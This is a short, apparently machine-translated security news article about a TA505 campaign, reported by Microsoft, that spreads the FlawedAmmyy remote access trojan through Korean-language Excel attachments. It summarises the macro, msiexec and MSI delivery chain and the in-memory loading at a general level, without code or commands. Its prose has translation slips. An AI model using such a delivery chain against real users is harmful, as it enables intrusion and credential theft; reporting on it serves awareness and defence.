As warned by Microsoft, a newly discovered malicious campaign, targets its victims' systems to spread the notorious FlawedAmmmy RAT directly into memory.
FlawedAmmyy is one Trojan Remote Access (RAT), which allows attackers to gain full access to their victims' machines and move sideways to a network.
Trojan can intercept important information from a system such as login files and credentials, extract screenshots, and even allow a hacker to have access to the victim's computer camera.
The malicious agent associated with older campaigns that attempted to develop this malware is TA505, which is best known for distributing Dridex banking Trojan and ransomware Locky.
According to Microsoft reports, the attack begins with the sending of malicious emails containing attachments in .xls and Korean content.
As soon as the user opens the file, it automatically starts a macro operation to execute the legitimate msiexec.exe tool, which in turn downloads an MSI file.
Within this MSI file, attackers "hide an executable designed to decrypt and execute another executable file in memory as soon as it is opened.
“This executable file downloads and decrypts another file, wsus.exe, which you also digitally sign. Wsus.exe decrypts and runs the final payload directly to memory. The final payload is Trojan FlawedAmmyy ”explains Microsoft Security Intelligence in one tweet her.
Earlier this month, Trend Micro referred to TA505 campaigns targeting various Latin American and Asian countries with FlawedAmmyy RAT and other RATs, revealing that the same infection mechanism has been used for over two months.
In fact, the malicious agent uses it backdoors such as FlawedAmmyy, Remote Manipulator (RMS), ServHelper and more for more than 6 months.